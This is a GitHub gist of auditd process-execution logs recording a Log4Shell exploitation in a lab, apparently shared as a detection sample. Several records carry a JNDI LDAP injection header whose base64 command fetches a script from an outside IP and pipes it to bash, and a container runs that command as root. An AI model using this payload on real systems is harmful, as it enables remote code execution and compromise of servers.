Skip to content

Instantly share code, notes, and snippets.

@Samirbous

Samirbous/log4j-auditd-log-example

Created December 13, 2021 08:37
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Samirbous/5b2197300cc3a92a80c334556d18ba01 to your computer and use it in GitHub Desktop.
Save Samirbous/5b2197300cc3a92a80c334556d18ba01 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
log4j-auditd-log-example
type=PROCTITLE msg=audit(12/13/2021 01:49:50.838:66) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=1 name=/usr/bin/clear inode=4194578 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=0 name=/usr/bin/clear inode=4194578 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:49:50.838:66) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:49:50.838:66) : argc=1 a0=clear
type=SYSCALL msg=audit(12/13/2021 01:49:50.838:66) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x5613225618a0 a1=0x56132257a310 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4461 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=clear exe=/usr/bin/clear subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:49:57.714:153) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:49:57.714:153) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:57.714:153) : item=1 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:49:57.714:153) : item=0 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:49:57.714:153) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:49:57.714:153) : argc=4 a0=curl a1=127.0.0.1:4444 a2=-H a3=X-Api-Version: ${jndi:ldap://10.0.2.17:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
type=SYSCALL msg=audit(12/13/2021 01:49:57.714:153) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322584a10 a1=0x56132256ecb0 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4462 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=curl exe=/usr/bin/curl subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:47.999:702) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:50:47.999:702) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:47.999:702) : item=1 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:47.999:702) : item=0 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:47.999:702) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:50:47.999:702) : argc=4 a0=curl a1=127.0.0.1:8080 a2=-H a3=X-Api-Version: ${jndi:ldap://10.0.2.17:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
type=SYSCALL msg=audit(12/13/2021 01:50:47.999:702) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322573a60 a1=0x561322570720 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4463 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=curl exe=/usr/bin/curl subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:48.203:1333) : proctitle=java -jar /app/spring-boot-application.jar
type=PATH msg=audit(12/13/2021 01:50:48.203:1333) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.203:1333) : item=1 name=/bin/sh inode=3168868 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.203:1333) : item=0 name=/bin/sh inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:48.203:1333) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:48.203:1333) : argc=3 a0=/bin/sh a1=-c a2=(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:48.203:1333) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:48.203:1333) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x55602e0da8c0 a1=0x55602dffd3c0 a2=0x7fffced4b0a8 a3=0x8080808080808080 items=3 ppid=1797 pid=4468 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=sh exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:48.267:1525) : proctitle=/bin/sh -c (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=PATH msg=audit(12/13/2021 01:50:48.267:1525) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.267:1525) : item=1 name=/usr/bin/wget inode=3169734 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:48.267:1525) : item=0 name=/usr/bin/wget inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:48.267:1525) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:48.267:1525) : argc=4 a0=wget a1=-q a2=-O- a3=80.71.158.12/lh.sh
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:48.267:1525) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:48.267:1525) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f07b0598e38 a1=0x7f07b0598db8 a2=0x7f07b0598de0 a3=0x8080808080808080 items=3 ppid=4468 pid=4470 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=wget exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:50.740:1609) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:50:50.740:1609) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.740:1609) : item=1 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.740:1609) : item=0 name=/usr/bin/curl inode=4194536 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:50.740:1609) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:50:50.740:1609) : argc=4 a0=curl a1=127.0.0.1:8080 a2=-H a3=X-Api-Version: ${jndi:ldap://10.0.2.17:1389/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
type=SYSCALL msg=audit(12/13/2021 01:50:50.740:1609) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322570e40 a1=0x561322570720 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4472 auid=kali uid=kali gid=kali euid=kali suid=kali fsuid=kali egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=curl exe=/usr/bin/curl subj==unconfined key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:50.796:2229) : proctitle=java -jar /app/spring-boot-application.jar
type=PATH msg=audit(12/13/2021 01:50:50.796:2229) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2229) : item=1 name=/bin/sh inode=3168868 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2229) : item=0 name=/bin/sh inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:50.796:2229) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:50.796:2229) : argc=3 a0=/bin/sh a1=-c a2=(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:50.796:2229) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:50.796:2229) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x55602dfde360 a1=0x55602ec1ec80 a2=0x7fffced4b0a8 a3=0x8080808080808080 items=3 ppid=1797 pid=4476 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=sh exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:50:50.796:2305) : proctitle=/bin/sh -c (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash
type=PATH msg=audit(12/13/2021 01:50:50.796:2305) : item=2 name=/lib/ld-musl-x86_64.so.1 inode=3168967 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2305) : item=1 name=/usr/bin/wget inode=3169734 dev=00:2f mode=link,777 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:50:50.796:2305) : item=0 name=/usr/bin/wget inode=3165103 dev=00:2f mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:50:50.796:2305) : cwd=/
type=EXECVE msg=audit(12/13/2021 01:50:50.796:2305) : argc=4 a0=wget a1=-q a2=-O- a3=80.71.158.12/lh.sh
type=BPRM_FCAPS msg=audit(12/13/2021 01:50:50.796:2305) : fver=0 fp=none fi=none fe=0 old_pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap old_pa=none pp=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pi=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pe=chown,dac_override,fowner,fsetid,kill,setgid,setuid,setpcap,net_bind_service,net_raw,sys_chroot,mknod,audit_write,setfcap pa=none frootid=0
type=SYSCALL msg=audit(12/13/2021 01:50:50.796:2305) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f152e291e38 a1=0x7f152e291db8 a2=0x7f152e291de0 a3=0x8080808080808080 items=3 ppid=4476 pid=4477 auid=unset uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=(none) ses=unset comm=wget exe=/bin/busybox subj==docker-default (enforce) key=(null)
----
type=PROCTITLE msg=audit(12/13/2021 01:51:32.457:2554) : proctitle=/bin/bash
type=PATH msg=audit(12/13/2021 01:51:32.457:2554) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:51:32.457:2554) : item=1 name=/usr/bin/sudo inode=4210977 dev=08:01 mode=file,suid,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(12/13/2021 01:51:32.457:2554) : item=0 name=/usr/bin/sudo inode=4210977 dev=08:01 mode=file,suid,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(12/13/2021 01:51:32.457:2554) : cwd=/home/kali
type=EXECVE msg=audit(12/13/2021 01:51:32.457:2554) : argc=5 a0=sudo a1=ausearch a2=-i a3=-sc a4=execve
type=SYSCALL msg=audit(12/13/2021 01:51:32.457:2554) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x561322588ec0 a1=0x561322565bc0 a2=0x56132255b770 a3=0xfffffffffffff44e items=3 ppid=1542 pid=4482 auid=kali uid=kali gid=kali euid=root suid=root fsuid=root egid=kali sgid=kali fsgid=kali tty=pts0 ses=2 comm=sudo exe=/usr/bin/sudo subj==unconfined key=(null)
@crypticsnail
Copy link

@Samirbous Hi, are you able to share the specific rule(s) that generated this output from the audit.rules file? Thank you.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment